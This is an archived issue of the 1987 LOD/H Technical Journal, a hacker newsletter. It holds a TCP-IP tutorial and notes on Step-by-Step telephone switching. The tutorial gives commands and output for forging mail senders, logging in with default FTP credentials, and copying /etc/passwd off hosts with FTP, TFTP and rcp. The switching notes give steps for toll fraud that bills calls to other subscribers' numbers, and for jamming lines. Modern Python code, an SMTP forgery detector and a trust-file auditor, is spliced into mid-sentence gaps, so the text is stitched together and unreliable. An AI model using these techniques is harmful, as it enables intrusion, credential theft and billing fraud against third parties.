💾 Archived View for gemini.spam.works › mirrors › textfiles › magazines › LOD › lod-2 captured on 2022-06-12 at 13:05:43.
THE LOD/H TECHNICAL JOURNAL
-----------------------

INTRODUCTION:

This is issue #2. We had originally planned to put out 6 issues a year, but it looks as if this will become a quarterly newsletter instead. This is because the articles take months to fully research, write, and edit. By year end, we hope to show that we are not a "fly-by-night" newsletter and will continue to provide you with the same level of information, accuracy, and originality as this issue and the first. We appreciate those who have been downloading, storing, and distributing the newsletter in its entirety, and hope this will continue, as it benefits everyone.

Here is the breakdown of this issue: 1 article on Telecommunications, 4 articles on Datacommunications, and one article in the 'other' category. Two of the authors also wrote articles for Issue 1, and 5 are new. Obviously this issue is more hacking related, whereas Issue 1 was more phreaking related. If you have any material which may be of interest, let us know.

Our 'sponsor' BBS list has been shortened to one dependable board, as Metal Shop Private, Shadowspawn, Hell Prozen Over, The Private Sector and Atlantis have all gone down, though some may be back online in the future. Left is Digital Logic. The usernumber/usernames for DL follow for those who wish to get in contact with us. We are open to suggestions for more Sponsor Boards.

   Digital Logic: 305-395-6906   New User Pass=DIGIT
   LOD/H Technical Journal Staff Account Number is 231.

One last note, a slight clarification on articles. Articles labeled with letters, i.e. Part A & Part B as in last issue's articles on the Outside Loop Distribution Plant by Phucked Agent 04 and the LOH Telenet Directory, along with this issue's article on Hacking CMS by Lex Luthor, are intended to be complete articles in themselves and should be merged together. They were broken up for editing and transmission purposes.
Articles labeled as Part 1 & Part 2 are separate articles based on the same subject.

-------------------------------------------------------------------------------

TABLE OF CONTENTS:

 01  Introduction to the LOD/H Technical Journal        Staff              04 K
     and Table Of Contents for Volume 1, Issue 2
 02  The Networked Unix                                 Solid State        17 K
 03  Step By Step (SXS) Switching System Notes          Phantom Phreaker   12 K
 04  A Guide to the PRIMOS Operating System             Carrier Culprit    25 K
 05  Identifying and Defeating Physical Security and    Lex Luthor         30 K
     Intrusion Detection Systems Part II: The Exterior
 06  A Discrete Unix Password Hacker                    Shooting Shark     09 K
 07  Hacking DEC's TOPS-20: Part II                     Blue Archer        25 K
 08  Hacking IBM's VM/CMS Operating System, Part A.     Lex Luthor         26 K
 09  Hacking IBM's VM/CMS Operating System, Part B.     Lex Luthor         25 K
 10  Network News & Notes                               Staff              07 K

     Total: 7 articles, 10 files                                          180 K

-------------------------------------------------------------------------------

The LOD/H Technical Journal: File #2 of 10

                        ----------------------------
                         The Networked UNIX: TCP-IP
                              by: SOLID STATE
                                June 23 1987
                        ----------------------------

PREFACE

I've written this article with the assumption that those reading it have a working knowledge of UNIX and large networks, specifically the DARPA Internet -- ARPAnet and MILnet. Within I offer guidance on features of the TCP-IP (Internet Transmission Control Protocol) architecture, such as FTP, TFTP, TELNET, SMTP, and the UNIX Remote Execution Facilities. Before I commence, I want to make it known that this file is not intended to be a 'why' file, but instead a 'how to' tutorial. In the event I get a good response concerning this document, I may later release a more technically oriented paper from a programmer's viewpoint.

NOTE: In instances where I give examples of a command format, words in capitals represent variables. For example, in the line '$ telnet HOST', HOST should be replaced (in LOWERCASE!) by the name of a system.
This is just my means of distinguishing between actual commands and their options. Control characters are denoted in the form of an exponent, e.g. ^H is control H.

YP DATABASE

Present on every UNIX that supports TCP-IP is a set of files, labeled by programmers as the yellow pages, that serve as a directory of the hosts and networks accessible by your system. These files are /etc/hosts and /etc/networks respectively. There may also be a third, /etc/hosts.equiv, which is a listing of those hosts that share resources and/or have users common to each other. They are ASCII text and have viewable permissions to all. Therefore it may prove helpful to print these out for reference and easy access. Entries in the above-mentioned files take the form:

   ###.###.###.###   host.owner.research   nicknames

Example:

   18.72.0.39   athena.mit.edu   mit-athena athena

The string of numbers, expressed in octal "dot notation", is the NetNumber of the host. It is followed by the complete name, and lastly by the other names by which the host is universally known. When attempting to access a system, any one of these identification codes may be used.

NOTE: Most of the databases one will come across are incomplete or may be outdated. A complete host list can be obtained from the Network Information Control Center (NIC) at SRI International; the host name is sri-nic.arpa.

TELNET

Telnet is the standard facility used for logging into other systems. It is found not only on UNIX, but on TOPS, VMS, and all the other various operating systems found on the DDN. To activate the program:

   % telnet HOST [PORT]

If invoked without arguments, it enters command mode, indicated by the prompt 'telnet>'. From here, many functions are available.

   open HOST [PORT]
        Open connection to the named computer. If PORT, which shall be explained subsequently, is omitted then telnet will contact the TELNET server of that host. As earlier mentioned, systems can be addressed by either their NetNumber, NetName, or a nickname.
   close
        Close connection and return to command mode.

   quit
        End session and exit program.

   status
        Show current status of telnet, i.e. connections and toggled options.

   z
        Suspend telnet. This allows you to operate an interactive shell on the local machine while an open connection to a remote host is pending.

   ? COMMAND
        Get help on COMMAND. Or if COMMAND is omitted, then a summary of all options is printed.

Once a connection has been established, telnet enters input mode where you can communicate directly with the remote. To return to command mode, enter ^]. A hacking session might look like:

   % telnet ucbvax.berkeley.edu
   Trying 10.2.0.78 ...
   Connected to ucbvax.berkeley.edu.
   Escape character is '^]'.

   4.3 BSD UNIX (ucbvax.Berkeley.EDU)

   login: example
   Password:
   ^D
   Connection closed by foreign host.
   %

PORTS

Each host on the Internet runs various daemons to perform tedious upkeep jobs like recording logs, mounting disks and, on UNIX, cleaning uucp and /tmp files. Along with the 'normal' daemons is one run to accommodate communication between a host and its peers on a network. inetd, the managing daemon of system-to-system communication, has a number of services which it regularly uses, but they can also be manually addressed via telnet. The notation, shown earlier, is simply:

   % telnet HOST PORT
   OR
   telnet> open HOST PORT

Each service has a port number associated with it. The number is decimal, in the range 0-1023. A database of all active services is located in the ASCII text file /etc/services.

From a hacker's view the following are very helpful in the process of penetrating a system:

   79   Finger server. Connecting to this will give a systat report similar to the one a user would get if he was on the target system and issued the finger command. Once connected to port 79, the host will sit idle until one of two things happens: either a return is pressed, which results in a general finger listing, or a username is entered, which returns that user's personal information.
   % telnet psuvax1.psu.edu 79
   Trying 128.118.6.2 ...
   Connected to psuvax1.psu.edu.
   Escape character is '^]'.

   Login   Name               TTY  Idle  When       Office
   opr     The Operator       co         Sat 19:02  334 Whitmo x5-9723
   hager   William W. Hager   d1         Sat 18:50  237-8876
   georg   Georg Schnitger    22   1:32  Sat 18:42  315 Whitmo x5-1406
   malik   Sohail Malik       p0   18    Sat 19:16  214c Compu x5-0816
   Connection closed by foreign host.
   %

   11   Systat server. This can not be issued to target UNIX systems, but is applicable to VMS and TOPS, where it returns data like that from finger.

   25   SMTP server. This is the server used for mail among systems. It is also the most vulnerable port to attack as it can be easily fooled. With this knowledge the hacker can assume any identity he wishes through mail.

For example, to send mail to guest@cc3.bbn.com from root@satnet.arpa, under normal circumstances one would have to possess the root account, from which he would just enter:

   % mail guest@cc3.bbn.com

But this is not always feasible or possible! So we must resort to an indirect, devious approach.

   % telnet cc3.bbn.com 25
   Trying 8.3.0.5 ...
   Connected to cc3.bbn.com.
   Escape character is '^]'.
   220 cc3.bbn.com. Sendmail 3.2/SMI-3.2 ready at Fri, 28 Feb 87 17:40:53 PST
   rcpt to: guest
   250 guest... Recipient ok
   mail from: root@satnet.arpa
   250 example... Sender ok
   data
   354 Enter mail, end with "." on a line by itself
   This is an example of the SMTP port.
   .
   250 Mail accepted
   ^]
   telnet> c
   Connection closed.
   %

To summarize the text above: first, contact the remote at port 25 using telnet:

   % telnet HOST 25

After system link authentication, enter:

   rcpt to: USERNAME

Ok? Type in the bogus identity:

   mail from: USERNAME@HOST

To start the message:

   data

Now, the mail:

   My organization has of late been discussing an upgrade to a Vax processor. The Sun computer we are currently using is immensely slow (and getting slower!) due to the demands put on it by the users.
   If you would allow me a demo account on your system so I may view its performance, I would be deeply grateful. Please respond to me through mail at: bogus!haha!sys1!jeff.

A period on a line by itself will complete the transfer:

   .

FTP

FTP is a file transfer program that is quite powerful and helpful to the hacker in obtaining access to a target. It can be used to send and receive data. Similar to telnet, the client with which to communicate can be specified when invoked:

   % ftp -n HOST

I always include the -n option as it disables auto-login and net-trace, an automatic feature which sends the originator's login and system name. The prompt for FTP is 'ftp>'.

   open HOST
        Establish connection to the named HOST.
   close
        Terminate connection and return to the command interpreter.
   quit
        Abort program.
   status
        Show status parameters.
   ! COMMAND
        Run shell command on the local machine. Like the 'z' option of telnet, if COMMAND is omitted, then an interactive shell is invoked. ^D will return the user back to the interpreter.
   ls
        Print a listing of the directory contents on the remote host in an abbreviated form. To do a long listing, enter 'dir'.
   cd REMOTE_DIRECTORY
        Change the working directory on the server.
   pwd
        Print working directory on the remote.
   lcd DIRECTORY
        Change the working directory on the local machine to DIRECTORY.
   get REMOTE_FILE LOCAL_FILE
        Receive REMOTE_FILE from the remote system and name it LOCAL_FILE on the local system.
   send LOCAL_FILE REMOTE_FILE
        Send LOCAL_FILE to the host and name it REMOTE_FILE.
   append LOCAL_FILE REMOTE_FILE
        Append LOCAL_FILE to the end of the distant file, REMOTE_FILE.
   rename REMOTE_FILE NEW_REMOTE_FILE
        Give a new name to a remote file.
   delete REMOTE_FILE
        Kill REMOTE_FILE.

Various other commands exist for bulk transfers and directory management. If there is ever any doubt on a command, help is always available:

   ftp> help COMMAND

Once a connection has been made, the computer will identify itself and then go idle.
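The port 25 dialogue earlier in this article shows why the envelope sender cannot be trusted: the server answers '250 ... Sender ok' to whatever follows 'mail from:'. What follows is an added example, not code from the article or from any sendmail release: a minimal receiver state machine that speaks the same reply codes, enforces the MAIL/RCPT/DATA order, and records the socket peer beside the claimed sender so that a forged envelope is visible in the log. The peer address, the reverse name 'dialup.example' and the transcript are constructed.

```python
"""Minimal SMTP receiver, constructed for this example (it is not the article's
sendmail).  It speaks the reply codes seen in the port 25 transcript, but it
enforces command order and logs the connecting host next to the client-supplied
MAIL FROM value: only the socket peer says where a message really came from."""
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

# Accepts "mail from: root@satnet.arpa" as typed in the article, and the
# RFC 821 form "MAIL FROM:<root@satnet.arpa>".
_ENVELOPE = re.compile(r'^(mail from|rcpt to):\s*<?([^<>\s]*)>?\s*$', re.IGNORECASE)


@dataclass
class Session:
    peer_addr: str                     # TCP peer address taken from the socket
    peer_name: str = ''                # reverse-DNS name, if the caller looked it up
    sender: Optional[str] = None       # MAIL FROM: unauthenticated, client-chosen
    recipients: List[str] = field(default_factory=list)
    body: List[str] = field(default_factory=list)
    in_data: bool = False
    log: List[str] = field(default_factory=list)


def handle_line(s: Session, line: str) -> str:
    """Process one client line and return the server's reply ('' while in DATA)."""
    if s.in_data:
        if line == '.':                         # end of message
            s.in_data = False
            s.log.append(f'message from <{s.sender}> to {s.recipients} '
                         f'via {s.peer_addr} ({s.peer_name or "no reverse name"})')
            return '250 Mail accepted'
        # RFC 821 dot-stuffing: a body line beginning with '..' meant '.'
        s.body.append(line[1:] if line.startswith('..') else line)
        return ''
    m = _ENVELOPE.match(line)
    if m:
        verb, addr = m.group(1).lower(), m.group(2)
        if verb == 'mail from':
            if s.sender is not None:
                return '503 Sender already specified'
            s.sender = addr
            return f'250 {addr}... Sender ok'   # accepted as claimed, never verified
        if s.sender is None:                    # the article's transcript sent RCPT first
            return '503 Need MAIL command'
        s.recipients.append(addr)
        return f'250 {addr}... Recipient ok'
    verb = line.split(' ', 1)[0].upper()
    if verb == 'HELO':
        return f'250 Hello {s.peer_addr}'
    if verb == 'DATA':
        if not s.recipients:
            return '503 Need RCPT (recipient)'
        s.in_data = True
        return '354 Enter mail, end with "." on a line by itself'
    if verb == 'RSET':
        s.sender, s.recipients, s.body = None, [], []
        return '250 Reset state'
    if verb == 'NOOP':
        return '250 OK'
    if verb == 'QUIT':
        return '221 Goodbye'
    return '500 Command unrecognized'


def envelope_finding(s: Session) -> Optional[str]:
    """Return a warning when the host claimed in MAIL FROM is not the host that
    actually connected; None when they agree or when no sender was given."""
    if not s.sender or '@' not in s.sender:
        return None
    claimed = s.sender.rsplit('@', 1)[1].lower()
    known = {name.lower() for name in (s.peer_addr, s.peer_name) if name}
    if claimed in known:
        return None
    return (f'envelope sender claims {claimed} but the connection came from '
            f'{s.peer_addr} ({s.peer_name or "no reverse name"})')


def run_session(peer_addr: str, client_lines: List[str],
                peer_name: str = '') -> Tuple[Session, List[str]]:
    """Feed a whole client transcript through the state machine."""
    s = Session(peer_addr=peer_addr, peer_name=peer_name)
    return s, [handle_line(s, line) for line in client_lines]


if __name__ == '__main__':
    # Constructed transcript: the client side of the article's exchange, arriving
    # from a constructed peer that is not satnet.arpa.
    transcript = ['rcpt to: guest', 'mail from: root@satnet.arpa', 'rcpt to: guest',
                  'data', 'This is an example of the SMTP port.', '.', 'quit']
    session, replies = run_session('192.0.2.10', transcript, peer_name='dialup.example')
    for sent, reply in zip(transcript, replies):
        print(f'C: {sent}' + (f'\n   S: {reply}' if reply else ''))
    print(envelope_finding(session))
```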
(That is, if auto-login is disabled, as it should be.) To login to the system:

   ftp> user USERNAME

Then, if a password is required, the proper prompt will appear.

   % ftp -n
   ftp> o ll-xn.arpa
   Connected to LL-XN.ARPA.
   220 ll-xn FTP server (Version 4.103 Wed Jun 25 17:42:33 EDT 1986) ready.
   ftp> user anonymous
   331 Guest login ok, send ident as password.
   Password:
   230 Guest login ok, access restrictions apply.
   ftp>

Logging on to an FTP server is different than normally entering a machine. When a remote user is operating FTP, the exchange is treated as a process of ftp or a daemon, not an actual login. Therefore, a different login program, which restricts use immensely, is used. If set up properly, FTP will chroot to /usr/spool/ftp where three directories exist: bin, etc, and pub. Within /usr/spool/ftp/etc is the password file used for the FTP server login program. It is not a complete version of that in /etc/passwd, but it can be useful by providing usernames.

Also worth mentioning is /etc/ftpusers. This file contains one username per line and is like /usr/lib/cron/cron.deny on a Unix System V. If you are unlucky and your username appears in the file, FTP logins are denied.

A few defaults are present within this doctored version of /etc/passwd that will almost always provide access to a system.

   ACCOUNT        PASSWORD
   =================================
   anonymous      anonymous, guest, ftp
   ftp            ftp
   guest          guest
   ftpser         ftpser
   tftpser        tftpser
   help           help

Each user may have in their home directory a file titled '.netrc'. This is a file containing usernames and passwords used on systems that a user commonly converses with. Entries in the file take the form:

   machine HOST login USERNAME password PASSWORD

It is advantageous to locate all of these files on your system as they will expand not only your systems list, but also your chance of entering a computer.
Once admittance has been gained, I suggest copying the /etc/passwd file for later attempts at hacking the front end of the system, if other routes such as defaults, finger, TFTP (to be explained hereafter), or the remote facilities (ditto) are not possible.

   ftp> get /etc/passwd pass
   200 PORT command okay.
   150 Opening data connection for /etc/passwd (26.8.0.14,1389) (47 bytes).
   226 Transfer complete.
   48 bytes received in 0.32 seconds (0.15 Kbytes/s)
   ftp> close
   221 Goodbye.
   ftp> quit
   %

TFTP

The Trivial File Transfer Program is probably the most dangerous aspect of the TCP-IP structure on the Internet. TFTP does not require an account or password on the host system. About the only restriction is that the files requested must have public read access permissions set. If not, an authorization failure error will result. Also, the TFTP server port must be open, otherwise no transmissions can take place.

   % tftp HOST

Once connected, the user will get the 'tftp>' prompt, from which he can grab or send files.

   connect HOST
        Set HOST up for transfers. There is no actual connection made in the sense that communication has happened; the program merely remembers which host is to be used in a transfer request. Therefore, there is no disconnect command.
   quit
        Exit TFTP.
   status
        Show currently set parameters, i.e. HOST and timeout period.
   get /PATH/FILE /PATH/FILE
        Get /PATH/FILE from HOST and name it /PATH/FILE on the local system. If no HOST has been specified yet, the form may be 'get HOST:/PATH/FILE /PATH/FILE'.
   put /PATH/FILE /PATH/FILE
        Send /PATH/FILE on the local system to HOST and give it the title /PATH/FILE. As above, if HOST has not been specified, the form is 'put /PATH/FILE HOST:/PATH/FILE'.
   timeout SECONDS
        Set the timeout parameter. The default is 25, meaning abort the transmission if there is no response from the selected host after the set period.
   ? COMMAND
        Help with TFTP.

TFTP is the preferred method of file transfer, but it is often closed to use due to its insecurities.
To the hacker, though, it is wonderful because the data captured are genuine, not doctored versions as is the case with FTP. Therefore, if possible, one will most likely use it to copy /etc/passwd:

   % tftp mit-amt
   tftp> get /etc/passwd /tmp/passwd
   Received 16453 bytes in 7 seconds.
   tftp> q
   %

REMOTE PROCEDURES

In addition to the standard features of the TCP setup present on all machines of the net, UNIX has a set of its own remote system interaction commands. The set of utilities, which I affectionately call the Remote Execution Facilities, are usable only between resource-sharing UNIX systems. The conglomeration of remote programs can be very helpful for overtaking other suspect targets, especially if they are part of a small network unto themselves besides being major hosts on the Internet.

Before one sets out on the quest of conquering a system, it is wise to know who is currently logged on:

   % rusers -l HOST

Rusers -l alone will print out a listing for all immediately surrounding UNIX hosts, but if a HOST is specified, only that particular computer will report.

   % rlogin HOST -l USERNAME

If -l USERNAME is not included, the account name in use at present is used as the USERNAME when attempting to login to HOST. If the username specified is present both locally and on the distant machine in the file /etc/hosts.equiv, no password is required to login. This can compromise security, a reason why the security-wise will often make /etc/hosts.equiv a null file.

Each user may optionally have a file, '.rhosts', in his home directory. This is a personal equivalent to /etc/hosts.equiv. If you are logged into an account with such a file, no password is required to login (via rlogin) to the computers named.
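The '.netrc' file described in the FTP section and the /etc/hosts.equiv and '.rhosts' files described just above are exactly the trust relationships an administrator should be auditing. The following is an added example, not code from the article: a Python audit that builds a constructed directory tree mirroring those files, then reports wildcard trust entries, loose permissions, and which machines have stored credentials, without ever printing a password. The constructed root, the sample user names and the host names in the fixture are assumptions.

```python
"""Audit of rlogin/rsh trust files and .netrc credential files, constructed for
this example (not the article's own tooling).  It walks a root that mirrors
/etc and the users' home directories and returns (severity, path, message)
findings; passwords found in .netrc are never included in a message."""
import os
import stat
import tempfile
from typing import Callable, List, Tuple

Finding = Tuple[str, str, str]   # (severity, path, message)


def _entries(path: str) -> List[List[str]]:
    """Whitespace-split lines, skipping blanks and '#' comments."""
    with open(path) as fh:
        return [ln.split() for ln in fh if ln.strip() and not ln.startswith('#')]


def audit_hosts_equiv(path: str) -> List[Finding]:
    out: List[Finding] = []
    if not os.path.exists(path) or os.path.getsize(path) == 0:
        return out                      # null file: the setting the article recommends
    for fields in _entries(path):
        host = fields[0]
        if host == '+':
            out.append(('critical', path, 'wildcard "+" trusts every host'))
        elif not host.startswith('-'):  # a leading '-' denies rather than trusts
            out.append(('warn', path, f'password-less rlogin/rsh trusted from {host}'))
    return out


def audit_rhosts(path: str) -> List[Finding]:
    out: List[Finding] = []
    mode = stat.S_IMODE(os.stat(path).st_mode)
    if mode & (stat.S_IWGRP | stat.S_IWOTH):
        out.append(('critical', path, f'writable by group/other (mode {mode:04o})'))
    for fields in _entries(path):          # format: host [user]
        host = fields[0]
        user = fields[1] if len(fields) > 1 else '<same user>'
        if host == '+' or user == '+':
            out.append(('critical', path, 'wildcard "+" entry'))
        elif not host.startswith('-'):
            out.append(('warn', path, f'trusts {user} from {host}'))
    return out


def audit_netrc(path: str) -> List[Finding]:
    out: List[Finding] = []
    mode = stat.S_IMODE(os.stat(path).st_mode)
    if mode & (stat.S_IRWXG | stat.S_IRWXO):
        out.append(('critical', path, f'readable/writable by others (mode {mode:04o})'))
    # token stream: machine HOST login USER password PASS [account ACCT] | default
    tokens = [t for fields in _entries(path) for t in fields]
    machines, i = [], 0
    while i < len(tokens):
        if tokens[i] == 'machine' and i + 1 < len(tokens):
            machines.append(tokens[i + 1]); i += 2
        elif tokens[i] == 'default':
            machines.append('default'); i += 1
        elif tokens[i] in ('login', 'password', 'account') and i + 1 < len(tokens):
            i += 2                          # skip the value: never surface a secret
        else:
            i += 1
    out.extend(('info', path, f'stores credentials for {m}') for m in machines)
    return out


def audit_tree(root: str, homes: str = 'home') -> List[Finding]:
    """Audit ROOT/etc/hosts.equiv and every ROOT/<homes>/<user>/{.rhosts,.netrc}."""
    findings = audit_hosts_equiv(os.path.join(root, 'etc', 'hosts.equiv'))
    home_root = os.path.join(root, homes)
    users = sorted(os.listdir(home_root)) if os.path.isdir(home_root) else []
    checks: List[Tuple[str, Callable[[str], List[Finding]]]] = [
        ('.rhosts', audit_rhosts), ('.netrc', audit_netrc)]
    for user in users:
        for name, check in checks:
            p = os.path.join(home_root, user, name)
            if os.path.isfile(p):
                findings += check(p)
    return findings


def build_sample_tree() -> str:
    """Constructed fixture mirroring the files the article describes."""
    root = tempfile.mkdtemp()
    os.makedirs(os.path.join(root, 'etc'))
    with open(os.path.join(root, 'etc', 'hosts.equiv'), 'w') as fh:
        fh.write('athena\n+\n')
    for user, name, text, mode in (
        ('alice', '.rhosts', 'century alice\n+ +\n', 0o664),
        ('bob', '.netrc', 'machine ll-xn.arpa login anonymous password guest\n', 0o644),
        ('carol', '.netrc', 'machine athena login carol password secret\n', 0o600),
    ):
        d = os.path.join(root, 'home', user)
        os.makedirs(d, exist_ok=True)
        p = os.path.join(d, name)
        with open(p, 'w') as fh:
            fh.write(text)
        os.chmod(p, mode)
    return root


if __name__ == '__main__':
    for sev, path, msg in audit_tree(build_sample_tree()):
        print(f'{sev:8} {path}: {msg}')
```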
Like the UUCP protocol, the Remote Execution Facilities allow commands to be performed on a networked system:

   % rsh HOST -l USERNAME "COMMAND"

Remote shell will permit unlimited commands to be carried out on the remote as long as the following criteria are met: the username, if specified (if it is not, the current local one is used), must be present on the foreign system and have remote execution privileges. Commands are effective according to the environment set in .cshrc and .login on the host. An example job:

   % rsh century "ps -t console"

If the quotes are omitted then variables like *?.,\ are taken literally. Also, if no redirection is submitted, then output, if the command yields it, is sent back to the issuer.

Remote Copy, a sub-command of rsh, is a command similar to uucp. It must follow the criteria of Remote Shell, plus all files queued must have public read permissions.

   % rcp HOST:/PATH/FILE HOST:/PATH/FILE

For example, a common call would be the password file. So if I wanted to transfer the /etc/passwd file from harvard.arpa to rutgers:

   % rcp harvard.arpa:/etc/passwd rutgers:/tmp/passwd

This format leaves quite a lot of flexibility; as it stands, third-party transfers are possible. If the second HOST is not inserted, then the file is put on the local system.

A notable option of rcp is directory copy. If specified, it will copy a directory and all the trees beneath it, allowing you, in theory, to copy the entire file system onto your local host. (uh, oh!)

   % rcp -d HOST:/PATH/DIRECTORY_NAME HOST:/PATH/DIRECTORY_NAME

CONCLUSION

In closing I would like to state that I have purposely left much information uncovered where I felt it would compromise an institution or company. I apologize for not explaining many of the subjects discussed in the full detail they deserve, but if I had, this article would have been mammoth.
Any questions, challenges, comments, or criticism can be directed to me, Solid State, through any of the various boards I visit or to an LOD/H Technical Journal account, from which your mail shall somehow be communicated to me.

                        STEP BY STEP SWITCHING NOTES
                             BY PHANTOM PHREAKER
                    WRITTEN FOR LOD/H TECHNICAL JOURNAL

The following research was done on a class 5 Step By Step switching system. Items mentioned in this article are not guaranteed to work with your particular office. The following interesting topics about Step By Step switching are for informational and educational purposes only. This article is aimed at people who wish to learn more about telephone switching systems. I realize step-by-step switching is dwindling every day, with many electromechanical SxS offices being replaced with newer electronic/digital switches and Remote Switching Systems (RSSs). However, rural areas of the U.S. still use Step, so if you are ever in an area served by a SxS CO you may be able to use this information.

1: ANI Failure/ONI

To understand this technique, you must understand how ANI functions in the Step-by-Step switching system. Your CO sends ANI, with your number, in MF or DP to receivers that collect the ANI information and store it, along with the called number, on the appropriate form of AMA tape. ANI outpulsing in MF can use either LAMA (Local Automatic Message Accounting) or CAMA (Centralized Automatic Message Accounting). ANI sent in DP type signalling can also be used, but is rare. DP vs MF trunk signalling is similar to the difference between DTMF and pulse dialing, except on a trunk. DP signalling sends all information in short bursts of 2600Hz tones.

Causing ANIFs/ONI is an easy task in SxS (and some versions of Xbar), because the customer's link to the CO will allow the customer to input MF tones to influence a call's completion. This can be done by dialing a long distance number and listening to the clicks that follow.
After the first click when you are done dialing, you will hear a few more. They will be timed very close to one another, and the last click occurs right before the called telephone rings. The number and speed of the clicks probably varies. Basically, what these clicks are is the Toll Office that serves your CO setting up a route for your call.

In order to abuse this knowledge, you need access to a MF source, whether it be a blue box, a computer with a good sound chip, a tape recording, etc. Right before you hear the series of clicks, send one of the following sequences in MF:

   KP+1 (Repeatedly)   For Automatic Number Identification Failure (ANIF)
        -or-
   KP+2 (Repeatedly)   For Operator Number Identification (ONI)

(Note: these will not work if your CO uses DP signalling.)

Play these tones into the phone at a sufficient volume so that they 'drown out' the series of clicks. Do not send an ST signal, as you are not actually dialing on a trunk. You must send these MF sequences quickly for this method to work correctly. After you have played your 'routing' a few times, you will hear a TSPS operator intercept your call and ask for the number you are calling FROM. When an ANIF is recognized, the call is cut through to a TSPS site that serves your area. Now, you can give the operator any number in your exchange and she will enter the billing information manually and put the call through. The toll charges will appear on the customer who owns the number you gave.

You can also accomplish a similar feat by merely flashing the switchhook during the series of clicks. This will send DC pulses that scramble the ANI outpulsing and cause your call to be sent to a TSPS operator before the dialed number. Be sure to stop sending the MF 'routing' after the operator attaches or she may know that something's up. Use this method sparingly and with caution. It would also be a good idea not to use the same number for billing more than one time.
Don't use this method in excess, because a toll office report will list the number of ANI failures for a specific time period. The ONI method works better because it is assumed ONI is needed to identify a caller's DN upon a multi-party line. Too many ANI failures will generate a report upon a security/maintenance TTY, so if you plan on using this method, use the ONI method instead of just ANI Failure.

The basic idea behind the ANIF is to scramble your ANI information by using MF (or the switchhook) to send your LD call to a TSPS operator for Operator Number Identification (ONI) due to ANI Failure. The idea behind the ONI method is that you are fooling the switch into thinking you are calling from a multi-party line and ONI is needed to identify your DN.

2: Test numbers

Some other interesting things in the Step By Step system can be found by dialing test numbers. Test numbers in SxS switching systems are usually hidden in the XX99 area, as opposed to 99XX, which is common for other types of switching systems. These types of numbers are possibly physical limitations of a SxS switch, and thus a milliwatt tone or other test numbers will be placed there, because a normal DN can't be assigned such a number. However, these XX99 numbers are usually listed in COSMOS as test numbers. Another interesting note about XX99 numbers is that they seem (at least in some offices) to be on the same circuit. (That is, if one person calls an XX99 number and receives a test tone, and another person calls any other XX99 number in that same prefix, the second caller will receive a busy signal.)

Here we must examine the last four digits of a telephone number in detail.

   XXXX = WXYZ
   W = Thousands digit
   X = Hundreds digit
   Y = Tens digit
   Z = Units digit

Dialing your prefix followed by an XX99 may result in a busy signal test number, a network overflow (reorder), milliwatt tones, or other types of error messages encountered when dialing. Not every XX99 number is a test number, but many are.
Try looking for these in a known Step by Step office. The numbers that return a busy signal are the ones that incoming callers are connected to when the Sleeve lead of the called Directory Number is in a voltage-present state, which means the line is in use or off-hook. More about this in the next topic.

3: Busy signal conferencing

Another interesting feature of the Step-By-Step system is the way busy tones (60 IPM) are generated. In ESS and DMS central offices, busy signals that are sent by the terminating switch are computer generated and sound very even and clear with no signal irregularity. In SxS, all calls to a particular DN are sent to the same busy signal termination number, which can be reached most of the time by a POTS number. These busy tones are not computer generated and the voice path is not cut off. You can take advantage of this and possibly have a 'busy signal conference'. This can be achieved by having several people dial the same busy DN that is served by a Step office, or by dialing an always-busy termination number. When you are connected to the busy signal, you will also be able to hear anyone else who has dialed the same busy number. Connection quality is very poor, however, so this is not a good way to communicate.

As an added bonus, answering supervision is not returned on busy numbers, and thus the call will be toll-free for all parties involved. However, you must be using AT&T as your inter-LATA carrier if the call to the busy number is an inter-LATA call for you. So if your IC is US Sprint, you must first dial the AT&T Carrier Access Code (10ATT) before the busy number. If your IC doesn't detect answer supervision, and begins billing immediately or after a certain amount of time, then you will be billed for the length of the call.

4: Temporarily 'freezing' a line

A SxS switching system that operates on the direct control principle is controlled directly by what the subscriber dials.
Jamming a line on SxS to prevent service is possible by simply flashing the switchhook a number of times. Or you may find that after several aborted dialing attempts, the line will freeze until it is reset, either manually or by some time-out mechanism. Usually the time the line is out of action is only a few minutes. The line will return a busy signal to all callers, and the subscriber who has a 'dead' phone will not even hear sidetone. This happens when one of the elements in the switch train gets jammed.

The switch train consists of the linefinder, which sends a dial tone to the subscriber who lifted his telephone, and places voltage on the S (Sleeve) lead so as to mark that given DN as busy. Next in the switch train are the selectors. The selectors are what receive the digits you dial and move accordingly. The last step in the switch train is the connector. The connector is what connects calls that are intraoffice, and sends calls to a Toll office when necessary. Other types of devices can be used in the switch train, such as Digit Absorbing Selectors, where needed.

5: Toll/Operator assisted dialing

You may be able to dial 1/0+ numbers with your prefix included in some areas. You can dial any call that you could normally reach by dialing 1+ or 0+. For example, to dial an operator-assisted call to a number in Chicago, you could dial NXX+0312+555+1000 where NXX is your prefix, and you would receive the usual TSPS bong tone, and the number you dialed, 312+555+1000, would show up on the TSPS console's LED readout board. You can also use a 1 in place of the 0 in the above example to put the call through as a normal toll call. This method does not bypass any type of billing, so don't get your hopes up high.

The reason this works is twofold. The first reason is that the thousands digit in many SxS offices determines the type of call. A 0 or a 1 in place of another number (which would represent a local call) is handled accordingly.
The other reason is due to a Digit Absorbing Selector that can be installed in some SxS offices to 'absorb' the prefix on intraoffice calls when it is not needed to process the call. A DAS can absorb either two or three digits, depending on whether the CO needs any prefix digit(s) for intraoffice call completion.

6: Hunting prefixes

SxS switches may also translate an improperly dialed local call and send it to the right area over interoffice trunks. Suppose, for instance, that you need to make a local call to 492-1000. You could dial 292-1000 and reach the exact same number, provided that there is no 292 prefix within your local calling area. However, only the first digit of a prefix may be modified or the call will not go through correctly, unless you happen to have dialed a valid local prefix. You also cannot use a 1 or a 0 in place of the first prefix digit, because the switch would interpret that as either dialing a toll or an operator-assisted call.

7: Trunks

Step by Step switching system incoming and outgoing trunks are very likely to use in-band supervisory signalling. This means you could possibly use numbers served by a SxS CO to blue box off of. But some older step areas may not use MF signalling, but DP signalling. DP signalling uses short bursts of 2600Hz to transfer information as opposed to Multi-Frequency tones. In DP signalling, there are no KP or ST equivalents. Boxing may be accomplished from DP trunks by sending short bursts of 2600Hz (2 bursts would be the digit 2). Acceptable pulse rates are 7.5 to 12 pulses per second, but the normal rate is 10 pulses per second. A pulse consists of an 'on hook' (2600Hz) tone and an off-hook (no tone). So, at 10 pulses per second, a digit might be .04 seconds of tone and .06 seconds of silence. DP is rarely used today, but some direct-control Step offices still use it. Common Control Step offices are much more likely to use MF trunk signalling.
As said at the start of this file, some of the things mentioned here may have no practical use, but are being exposed to the public and to those who did not previously know about any of the procedures mentioned here.

References and acknowledgements
===============================================================================
